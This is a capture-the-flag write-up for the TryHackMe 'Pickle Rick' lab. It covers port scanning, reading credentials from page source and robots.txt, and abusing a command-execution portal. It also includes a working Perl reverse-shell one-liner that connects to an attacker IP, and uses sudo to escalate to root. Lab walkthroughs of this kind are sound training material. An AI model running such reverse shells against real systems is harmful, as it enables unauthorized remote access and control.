CTF-Writeups/TryHackMe/PickleRickCTF.md
2020-08-22 00:03:24 +05:00

4.4 KiB

TryHackMe-PickleRick CTF

Abdullah Rizwan ,21 August , 09:35 PM

PickleRick is a free beginner level webapplication kinda CTF.

NMAP

Like always we are going to fire up our nmap scan on the box to look for open ports

nmap -T4 -A -p- 10.10.208.39

Here -T4 tells the speed of scanning -A tells to look for all -p- tells to look for ports

and in the end is the box ip (machine ip)

Here we can see that there are 2 open ports

SSH (22) HTTP (80)

So first we will try to exploit HTTP

This is the home page that is loaded upon entering the ip address.

If we try to look at the source we can see Wubbalubbadubdubthat it's telling us that there's a user named "R1ckRul3s" so we are going to use it later when we try to ssh are way into the box.

Port 80

I tried to see if "robots.txt" was accessable and what I found was a text "Wubbalubbadubdub" , i don't know what it means by lets see what elese we can find.

Dirbuster

On bruteforcing directory we find out that there is a login page on the website

On submitting the username and the text we found on robots.txt we are able to login to the potral

From here we can execute commands like "pwd" or "whoami" which will give result of these commands so we can use this as a shell.

On the current directory on giving "ls" command we can see what is that current directory also on looking at the source of the page we can find a base64 text but it doesn't really decode into something.

But we still can't access the files on the webpage.

I headed over to pentest monkey

Tried the nc(netcat),php,bash,python2 reverse shell but they didn't work so then i tired the perl reverse shell however we can use python3 instead of python2 to execute python reverse shell.

perl -e 'use Socket;$i="10.8.94.60";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

It gave me a reverse shell on my terminal.

First Ingredient

So now for the first ingredient I had no problem in viewing "Sup3rS3cretPickl3Ingred.txt".

Second Ingredient

For second ingredient I moved around the directories and found something named "second ingredients".

For viewing this file as there is a space in between so in linux you have to use '\ ' backslash + space for entering second string of a file.

Third Ingredient

For the third ingredient there are two ways:

  1. Since we can ran any command by writing "sudo" before it so one way is to look into "ubuntu" folder and there we have a file called ".bash_history"

  1. Another method for getting the third ingredient is by accessing "root" folder.

  1. Or you can run "sudo bash" , that would make you a root user.

You have successfully completed this CTF.